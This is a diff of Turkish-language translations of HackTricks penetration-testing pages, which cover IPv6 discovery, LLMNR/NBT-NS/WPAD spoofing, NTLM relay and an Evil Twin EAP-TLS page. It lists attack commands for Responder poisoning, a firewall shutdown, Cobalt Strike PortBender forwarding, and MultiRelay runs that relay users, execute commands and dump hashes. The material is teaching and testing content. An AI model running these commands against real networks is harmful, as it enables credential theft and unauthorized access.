- **Bağ Yerel Adresler (`FE80::/10`)**: İnternet yönlendirmesi için değil, yerel ağ etkinlikleri için. Aynı yerel ağdaki cihazlar, birbirlerini bu aralığı kullanarak keşfedebilir.
### Ağ Komutlarında IPv6'nın Pratik Kullanımı
### IPv6'nın Ağ Komutlarında Pratik Kullanımı
IPv6 ağlarıyla etkileşim kurmak için çeşitli komutlar kullanabilirsiniz:
IPv6 ağlarıyla etkileşimde bulunmak için çeşitli komutları kullanabilirsiniz:
- **Bağ Yerel Adreslerini Pingleme**: `ping6` kullanarak yerel cihazların varlığını kontrol edin.
- **Komşu Keşfi**: Bağ katmanında keşfedilen cihazları görüntülemek için `ip neigh` kullanın.
- **Komşu Keşfi**: `ip neigh` kullanarak bağ katmanında keşfedilen cihazları görüntüleyin.
- **alive6**: Aynı ağdaki cihazları keşfetmek için alternatif bir araç.
Aşağıda bazı komut örnekleri bulunmaktadır:
@ -46,84 +47,67 @@ ip neigh | grep ^fe80
# Alternatively, use alive6 for neighbor discovery
alive6 eth0
```
IPv6 adresleri, yerel iletişim için bir cihazın MAC adresinden türetilebilir. İşte bilinen bir MAC adresinden Link-local IPv6 adresini nasıl türeteceğinize dair basitleştirilmiş bir kılavuz ve bir ağ içinde IPv6 adreslerini keşfetmek için kullanılan yöntemlerin kısa bir genel bakışı.
## **MAC Adresinden Link-local IPv6 Türetme**
Bir MAC adresi **`12:34:56:78:9a:bc`** verildiğinde, Link-local IPv6 adresini aşağıdaki gibi oluşturabilirsiniz:
Bir cihazın MAC adresinden yerel iletişim için IPv6 adresleri türetilebilir. Bilinen bir MAC adresinden Link-local IPv6 adresini nasıl türeteceğinize dair basitleştirilmiş bir rehber aşağıda verilmiştir:
1. MAC adresini IPv6 formatına dönüştürün: **`1234:5678:9abc`**
2. `fe80::` ön ekini ekleyin ve ortaya `fffe` ekleyin: **`fe80::1234:56ff:fe78:9abc`**
3. Soldan yedinci biti ters çevirerek `1234``1034` olarak değiştirin: **`fe80::1034:56ff:fe78:9abc`**
3. Soldan yedinci biti tersine çevirerek `1234``1034` olarak değiştirin: **`fe80::1034:56ff:fe78:9abc`**
## **IPv6 Adres Türleri**
- **Unique Local Address (ULA)**: Yerel iletişim için, genel internet yönlendirmesi için değil. Önek: **`FEC00::/7`**
- **Multicast Adresi**: Birçok cihaza iletişim için. Multicast grubundaki tüm arayüzlere iletilir. Önek: **`FF00::/8`**
- **Anycast Adresi**: Birbirine en yakın iletişim için. Yönlendirme protokolüne göre en yakın arayüze gönderilir. **`2000::/3`** küresel unicast aralığının bir parçasıdır.
- **Benzersiz Yerel Adres (ULA)**: Genel internet yönlendirmesi için değil, yerel iletişimler için kullanılır. Önek: **`FEC00::/7`**
- **Çoklu Yayın Adresi**: Birçok cihaza iletişim için kullanılır. Çoklu yayın grubundaki tüm arayüzlere iletilir. Önek: **`FF00::/8`**
- **Anycast Adresi**: En yakına iletişim için kullanılır. Yönlendirme protokolüne göre en yakın arayüze gönderilir. **`2000::/3`** küresel tek yayın aralığının bir parçasıdır.
## **Adres Önekleri**
- **fe80::/10**: Link-Local adresleri (169.254.x.x'ye benzer)
- **fc00::/7**: Unique Local-Unicast (10.x.x.x, 172.16.x.x, 192.168.x.x gibi özel IPv4 aralıklarına benzer)
- **2000::/3**: Global Unicast
- **ff02::1**: Multicast Tüm Düğümler
- **ff02::2**: Multicast Yönlendirici Düğümler
- **fe80::/10**: Link-Local adresler (169.254.x.x'ye benzer)
- **fc00::/7**: Benzersiz Yerel-Unicast (10.x.x.x, 172.16.x.x, 192.168.x.x gibi özel IPv4 aralıklarına benzer)
- **2000::/3**: Küresel Unicast
- **ff02::1**: Tüm Düğümler Çoklu Yayın
- **ff02::2**: Yönlendirici Düğümler Çoklu Yayın
## **Bir Ağ İçinde IPv6 Adreslerini Keşfetme**
### Yöntem 1: Link-local Adresleri Kullanma
### Yöntem 1: Link-local Adresler Kullanarak
1. Ağ içindeki bir cihazın MAC adresini edinin.
2. MAC adresinden Link-local IPv6 adresini türetin.
### Yöntem 2: Multicast Kullanma
1. Yerel ağdaki IPv6 adreslerini keşfetmek için `ff02::1` multicast adresine bir ping gönderin.
### Yöntem 2: Çoklu Yayın Kullanarak
1. Yerel ağdaki IPv6 adreslerini keşfetmek için `ff02::1` çoklu yayın adresine bir ping gönderin.
```bash
service ufw stop # Stop the firewall
ping6 -I <IFACE> ff02::1 # Send a ping to multicast address
ip -6 neigh # Display the neighbor table
```
## IPv6 Orta Adam (MitM) Saldırıları
IPv6 ağlarında MitM saldırılarını gerçekleştirmek için birkaç teknik bulunmaktadır, bunlar şunlardır:
IPv6 ağlarında MitM saldırıları gerçekleştirmek için birkaç teknik mevcuttur, bunlar şunlardır:
- ICMPv6 komşu veya yönlendirici reklamlarını sahtecilik yapma.
- ICMPv6 komşu veya yönlendirici reklamlarını sahteleme.
- Yönlendirmeyi manipüle etmek için ICMPv6 yönlendirme veya "Paket Çok Büyük" mesajlarını kullanma.
- Mobil IPv6 saldırısı (genellikle IPSec'in devre dışı bırakılması gerekmektedir).
- Mobil IPv6 saldırısı (genellikle IPSec'in devre dışı bırakılmasını gerektirir).
- Sahte bir DHCPv6 sunucusu kurma.
# IPv6 Adreslerini Bulma
# IPv6 Adreslerini Tanımlama
## Alt Alanları Keşfetme
IPv6 adresleriyle potansiyel olarak ilişkili olan alt alanları bulmanın bir yöntemi, arama motorlarını kullanmaktır. Örneğin, `ipv6.*` gibi bir sorgu deseni kullanmak etkili olabilir. Özellikle, aşağıdaki arama komutu Google'da kullanılabilir:
IPv6 adresleriyle ilişkilendirilmiş olabilecek alt alanları bulmanın bir yolu, arama motorlarından faydalanmaktır. Örneğin, `ipv6.*` gibi bir sorgu desenini kullanmak etkili olabilir. Özellikle, Google'da aşağıdaki arama komutu kullanılabilir:
```bash
site:ipv6./
```
## DNS Sorguları Kullanma
IPv6 adreslerini belirlemek için belirli DNS kayıt türleri sorgulanabilir:
- **AXFR**: Geniş bir DNS kaydı yelpazesini ortaya çıkarabilecek şekilde tam bir bölge transferi isteği yapar.
- **AXFR**: Geniş bir DNS kayıtları yelpazesini ortaya çıkarabilen tam bir bölge transferi isteği.
- **AAAA**: Doğrudan IPv6 adreslerini arar.
- **ANY**: Mevcut tüm DNS kayıtlarını döndüren geniş bir sorgu.
- **ANY**: Tüm mevcut DNS kayıtlarını döndüren geniş kapsamlı bir sorgu.
## Ping6 ile Sondaj Yapma
Bir kuruluşla ilişkilendirilmiş IPv6 adreslerini belirledikten sonra, sondaj için `ping6` aracı kullanılabilir. Bu araç, belirlenen IPv6 adreslerinin yanıt verme yeteneğini değerlendirmeye yardımcı olur ve aynı zamanda yanıt veren IPv6 cihazları keşfetmede de yardımcı olabilir.
Bir organizasyonla ilişkilendirilen IPv6 adreslerini belirledikten sonra, `ping6` aracı sondaj yapmak için kullanılabilir. Bu araç, belirlenen IPv6 adreslerinin yanıt verme durumunu değerlendirmeye yardımcı olur ve ayrıca yanındaki IPv6 cihazlarını keşfetmede de yardımcı olabilir.
## Referanslar
* [http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html](http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html)
* [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramanla öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
</details>

View file

@ -1,82 +1,83 @@
# LLMNR, NBT-NS, mDNS/DNS ve WPAD Sahteciliği ve İletim Saldırıları
# Sahte LLMNR, NBT-NS, mDNS/DNS ve WPAD ve Aktarma Saldırıları
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da takip edin.
* Hacking hilelerinizi göndererek **HackTricks** ve **HackTricks Cloud** github depolarına **PR göndererek** paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
## Ağ Protokolleri
### Yerel Ana Bilgisayar Çözümleme Protokolleri
- **LLMNR, NBT-NS ve mDNS**:
- Microsoft ve diğer işletim sistemleri, DNS başarısız olduğunda yerel ad çözümlemesi için LLMNR ve NBT-NS kullanır. Benzer şekilde, Apple ve Linux sistemleri mDNS kullanır.
- Bu protokoller, kimlik doğrulama yapılmayan, UDP üzerinden yayın yapan doğası nedeniyle dinleme ve sahteciliğe karşı savunmasızdır.
- [Responder](https://github.com/lgandx/Responder), bu protokolleri sorgulayan ana bilgisayarlara sahte yanıtlar göndererek hizmetleri taklit etmek için kullanılabilir.
- Responder kullanarak hizmet taklit etme hakkında daha fazla bilgiye [buradan](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) ulaşabilirsiniz.
- Microsoft ve diğer işletim sistemleri DNS başarısız olduğunda yerel ad çözümlemesi için LLMNR ve NBT-NS kullanır. Benzer şekilde, Apple ve Linux sistemleri mDNS kullanır.
- Bu protokoller, kimlik doğrulamasız, UDP üzerinden yayın yapmaları nedeniyle dinleme ve sahtecilikten etkilenir.
- Bu protokollerin sorgulayan ana bilgisayarlara sahte yanıtlar göndererek hizmetleri taklit etmek için [Responder](https://github.com/lgandx/Responder) kullanılabilir.
- Responder kullanarak hizmet taklit etme hakkında daha fazla bilgiye [buradan](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) ulaşılabilir.
### Web Proxy Auto-Discovery Protocol (WPAD)
- WPAD, tarayıcıların proxy ayarlarını otomatik olarak keşfetmelerine olanak tanır.
- Keşif, DHCP, DNS veya DNS başarısız olursa LLMNR ve NBT-NS'ye geri düşme yoluyla kolaylaştırılır.
- Responder, WPAD saldırılarını otomatikleştirebilir ve istemcileri kötü niyetli WPAD sunucularına yönlendirebilir.
### Web Proxy Otomatik Keşif Protokolü (WPAD)
- WPAD tarayıcıların proxy ayarlarını otomatik olarak keşfetmelerine olanak tanır.
- Keşif, DHCP, DNS veya DNS başarısız olursa LLMNR ve NBT-NS'ye geri dönerek kolaylaştırılır.
- Responder, istemcileri kötü niyetli WPAD sunucularına yönlendiren WPAD saldırılarını otomatikleştirebilir.
### Protokol Zehirleme için Responder
- **Responder**, LLMNR, NBT-NS ve mDNS sorgularını zehirlemek için kullanılan bir araçtır ve sorgu türlerine göre seçici yanıtlar vererek öncelikle SMB hizmetlerini hedef alır.
- Kali Linux'ta önceden yüklenmiş olarak gelir ve `/etc/responder/Responder.conf` dosyasından yapılandırılabilir.
- Responder, yakalanan karmaşaları ekranda görüntüler ve `/usr/share/responder/logs` dizininde kaydeder.
### Protokol Zehirleme İçin Responder
- **Responder**, LLMNR, NBT-NS ve mDNS sorgularını zehirlemek için kullanılan bir araçtır, sorgu türlerine göre seçici olarak yanıt verir ve genellikle SMB hizmetlerini hedef alır.
- Kali Linux'ta önceden yüklenmiş olarak gelir ve `/etc/responder/Responder.conf` konumunda yapılandırılabilir.
- Responder, yakalanan hash'leri ekranda gösterir ve bunları `/usr/share/responder/logs` dizininde kaydeder.
- IPv4 ve IPv6'yı destekler.
- Responder'ın Windows sürümü [burada](https://github.com/lgandx/Responder-Windows) bulunabilir.
#### Responder'ı Çalıştırma
- Varsayılan ayarlarla Responder'ı çalıştırmak için: `responder -I <Arayüz>`
- Daha agresif keşif için (potansiyel yan etkilerle): `responder -I <Arayüz> -P -r -v`
- Daha agresif sorgulama için (potansiyel yan etkilerle): `responder -I <Arayüz> -P -r -v`
- NTLMv1 meydan okumalarını/yanıtlarını daha kolay kırabilmek için teknikler: `responder -I <Arayüz> --lm --disable-ess`
- WPAD taklitini etkinleştirmek için: `responder -I <Arayüz> --wpad`
- NetBIOS istekleri saldırganın IP'sine çözümlenebilir ve kimlik doğrulama proxy'si kurulabilir: `responder.py -I <arayüz> -Pv`
- WPAD taklit edilmesi şu şekilde etkinleştirilebilir: `responder -I <Arayüz> --wpad`
- NetBIOS istekleri saldırganın IP'sine çözümlenebilir ve kimlik doğrulama vekili kurulabilir: `responder.py -I <arayüz> -Pv`
### Responder ile DHCP Zehirleme
- DHCP yanıtlarını sahtecilik yaparak bir kurbanın yönlendirme bilgilerini kalıcı olarak zehirleyebilir ve ARP zehirlemeye göre daha gizli bir alternatif sunar.
- DHCP yanıtlarını sahteleştirerek bir kurbanın yönlendirme bilgilerini kalıcı olarak zehirleyebilir, ARP zehirleme için daha gizli bir alternatif sunar.
- Hedef ağın yapılandırması hakkında kesin bilgi gerektirir.
- Saldırıyı çalıştırma: `./Responder.py -I eth0 -Pdv`
- Bu yöntem, etkili bir şekilde NTLMv1/2 karmaşalarını yakalayabilir, ancak ağ kesintisini önlemek için dikkatli bir şekilde kullanılmalıdır.
- Saldırıyı çalıştırmak: `./Responder.py -I eth0 -Pdv`
- Bu yöntem etkili bir şekilde NTLMv1/2 hash'lerini yakalayabilir, ancak ağ kesintisinden kaçınmak için dikkatli bir şekilde ele alınmalıdır.
### Responder ile Kimlik Bilgilerini Yakalama
- Responder, yukarıda bahsedilen protokolleri kullanarak hizmetleri taklit eder ve bir kullanıcı sahte hizmetlere kimlik doğrulama yapmaya çalıştığında kimlik bilgilerini (genellikle NTLMv2 Meydan Okuma/Yanıtı) yakalar.
- Kimlik bilgileri kırılması daha kolay olması için NetNTLMv1'e düşürme veya ESS'yi devre dışı bırakma girişimleri yapılabilir.
### Responder ile Kimlik Bilgilerinin Yakalanması
- Responder yukarıda bahsedilen protokoller kullanılarak hizmetleri taklit eder, kullanıcılar sahtecilik yapılan hizmetlere kimlik doğrulamaya çalıştığında kimlik bilgilerini (genellikle NTLMv2 Meydan Okuma/Yanıtı) yakalar.
- Kimlik bilgilerini daha kolay kırmak için NetNTLMv1'e düşürme veya ESS'yi devre dışı bırakma girişimleri yapılabilir.
Bu tekniklerin yasal ve etik olarak kullanılması, uygun yetkilendirme sağlanması ve ağa zarar verme veya izinsiz erişimden kaçınılması önemlidir.
Bu tekniklerin yasal ve etik bir şekilde kullanılması, uygun yetkilendirme sağlanması ve ağda kesinti veya izinsiz erişimden kaçınılması önemlidir.
## Inveigh
Inveigh, Windows sistemler için tasarlanmış bir penetrasyon testi ve kırmızı takım aracıdır. Responder'a benzer işlevler sunar ve sahtecilik ve orta adam saldırıları gerçekleştirir. Araç, bir PowerShell komut dosyasından C# ikili bir dosyaya evrim geçirmiştir ve [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) ve [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) ana sürümleri bulunmaktadır. Ayrıntılı parametreler ve talimatlar [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters)'de bulunabilir.
Inveigh, Windows sistemler için tasarlanmış bir araçtır ve penetrasyon testçileri ve kırmızı takım üyeleri için benzer işlevlere sahiptir. Sahtecilik ve adam ortasında saldırılar gerçekleştiren Responder'a benzer işlevsellikler sunar. Araç, bir PowerShell betiğinden C# ikiliye evrim geçirmiş olup [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) ve [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) ana sürümleri olarak geliştirilmiştir. Detaylı parametreler ve talimatlar [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters) sayfasında bulunabilir.
Inveigh, PowerShell aracılığıyla çalıştırılabilir:
Inveigh, PowerShell üzerinden çalıştırılabilir:
```powershell
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
```
Veya bir C# ikili olarak yürütülür:
Ya da bir C# ikili dosyası olarak yürütülür:
```bash
Inveigh.exe
```
### NTLM Relay Saldırısı
### NTLM Aktarım Saldırısı
Bu saldırı, bir hedef makineye erişmek için SMB kimlik doğrulama oturumlarını kullanır ve başarılı olması durumunda bir sistem kabuğu sağlar. Ana gereksinimler şunları içerir:
- Kimlik doğrulayan kullanıcının, iletilen ana bilgisayarda Yerel Yönetici erişimine sahip olması gerekmektedir.
- SMB imzalama devre dışı bırakılmalıdır.
Bu saldırı, bir hedef makineye erişmek için SMB kimlik doğrulama oturumlarını kullanır ve başarılı olursa bir sistem kabuğu sağlar. Ana gereksinimler şunlardır:
- Kimlik doğrulayan kullanıcının, iletilen ana bilgisayarda Yerel Yönetici erişimine sahip olması gerekir.
- SMB imzalamasının devre dışı bırakılması gerekmektedir.
#### 445 Port Yönlendirme ve Tünelleme
Doğrudan ağ tanıtımının mümkün olmadığı senaryolarda, 445 numaralı port üzerindeki trafiğin yönlendirilmesi ve tünellemesi gerekmektedir. [**PortBender**](https://github.com/praetorian-inc/PortBender) gibi araçlar, 445 numaralı port trafiğini başka bir porta yönlendirmede yardımcı olur ve yerel yönetici erişimi sürücü yükleme için mevcut olduğunda önemlidir.
Doğrudan ağ tanıtımının mümkün olmadığı senaryolarda, 445 numaralı port üzerindeki trafiğin yönlendirilmesi ve tünellenmesi gerekmektedir. [**PortBender**](https://github.com/praetorian-inc/PortBender) gibi araçlar, 445 numaralı port trafiğini başka bir porta yönlendirmede yardımcı olur; bu, yerel yönetici erişimi sürücü yükleme için kullanılabilir olduğunda önemlidir.
Cobalt Strike'da PortBender kurulumu ve işletimi:
Cobalt Strike'da PortBender kurulumu ve işleyişi:
```bash
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
@ -92,17 +93,17 @@ beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
```
### NTLM Relay Saldırısı için Diğer Araçlar
### NTLM Aktarım Saldırısı için Diğer Araçlar
- **Metasploit**: Proxy'ler, yerel ve uzak ana bilgisayar ayrıntılarıyla yapılandırılır.
- **smbrelayx**: SMB oturumlarını iletmek ve komutları yürütmek veya arka kapılar dağıtmak için Python betiği.
- **MultiRelay**: Belirli kullanıcıları veya tüm kullanıcıları iletmek, komutları yürütmek veya hash'leri dökmek için Responder paketinin bir aracı.
- **Metasploit**: Proxy'ler, yerel ve uzak ana bilgisayar ayrıntıları ile kurulur.
- **smbrelayx**: SMB oturumlarını aktarmak ve komutları yürütmek veya arka kapılar dağıtmak için Python betiği.
- **MultiRelay**: Belirli kullanıcıları veya tüm kullanıcıları aktarmak, komutları yürütmek veya hash'leri dökmek için Responder paketinden bir araç.
Her bir araç, gerektiğinde SOCKS proxy üzerinden çalışacak şekilde yapılandırılabilir, böylece dolaylı ağ erişimi ile bile saldırılar gerçekleştirilebilir.
Her bir araç, gerektiğinde SOCKS proxy üzerinden çalışacak şekilde yapılandırılabilir, dolaylı ağ erişimi ile bile saldırıları mümkün kılar.
### MultiRelay İşleyişi
### MultiRelay İşlemi
MultiRelay, _**/usr/share/responder/tools**_ dizininden belirli IP'ler veya kullanıcılar hedef alınarak çalıştırılır.
MultiRelay, belirli IP'ler veya kullanıcıları hedefleyerek _**/usr/share/responder/tools**_ dizininden yürütülür.
```bash
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
@ -110,11 +111,9 @@ python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
```
Bu araçlar ve teknikler, çeşitli ağ ortamlarında NTLM Relay saldırıları gerçekleştirmek için kapsamlı bir set oluşturur.
### NTLM Aktarım Saldırılarını Yapmak İçin Kapsamlı Bir Set
### NTLM Oturumu Zorlama
Windows'ta, bazı ayrıcalıklı hesapları **keyfi makinelerde kimlik doğrulamaya zorlayabilirsiniz**. Nasıl yapılacağını öğrenmek için aşağıdaki sayfayı okuyun:
Windows'ta **bazı ayrıcalıklı hesapları zorlayarak** bu hesapların keyfi makinelerde kimlik doğrulamasını yapmasını sağlayabilirsiniz. Nasıl yapılacağını öğrenmek için aşağıdaki sayfayı okuyun:
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
@ -128,16 +127,17 @@ Windows'ta, bazı ayrıcalıklı hesapları **keyfi makinelerde kimlik doğrulam
* [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
{% hint style="success" %}
AWS Hacking'ı Öğrenin ve Uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ı Öğrenin ve Uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin.**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,55 +1,56 @@
# Kötü İkiz EAP-TLS
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek** paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
</details>
{% endhint %}
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**Ödül avı ipucu**: **Hackerlar tarafından oluşturulan premium bir ödül avı platformu olan Intigriti'ye** kaydolun! Bugün [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) adresine katılın ve **100.000 $'a kadar ödüller kazanmaya başlayın**!
**Ödül avcılığı ipucu**: **Intigriti'ye kaydolun**, hackerlar tarafından oluşturulan bir premium **ödül avcılığı platformu**! Bugün [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) adresinde bize katılın ve **$100,000**'a kadar ödüller kazanmaya başlayın!
{% embed url="https://go.intigriti.com/hacktricks" %}
Bir noktada, aşağıdaki gönderide önerilen çözümü kullanmam gerekiyordu, ancak [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) adımları modern kali (2019v3) üzerinde çalışmıyordu.\
Neyse ki, onları çalıştırmak kolaydır.\
Sadece buradan hostapd-2.6'yı indirmeniz gerekiyor: [https://w1.fi/releases/](https://w1.fi/releases/) ve hostapd-wpe'yi yeniden derlemeden önce `apt-get install libssl1.0-dev` komutunu çalıştırın.
Bir noktada, aşağıdaki yazıda önerilen çözümü kullanmam gerekiyordu ancak [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) adımları modern kali (2019v3) üzerinde artık çalışmıyordu.\
Neyse ki, onları çalışır hale getirmek kolaydı.\
Sadece buradan hostapd-2.6'yı indirmeniz gerekiyor: [https://w1.fi/releases/](https://w1.fi/releases) ve hostapd-wpe'yi tekrar derlemeden önce şunları yükleyin: `apt-get install libssl1.0-dev`
### Kablosuz Ağlarda EAP-TLS'nin Analizi ve Sömürülmesi
### Kablosuz Ağlarda EAP-TLS'in Analizi ve Sömürülmesi
#### Arka Plan: Kablosuz Ağlarda EAP-TLS
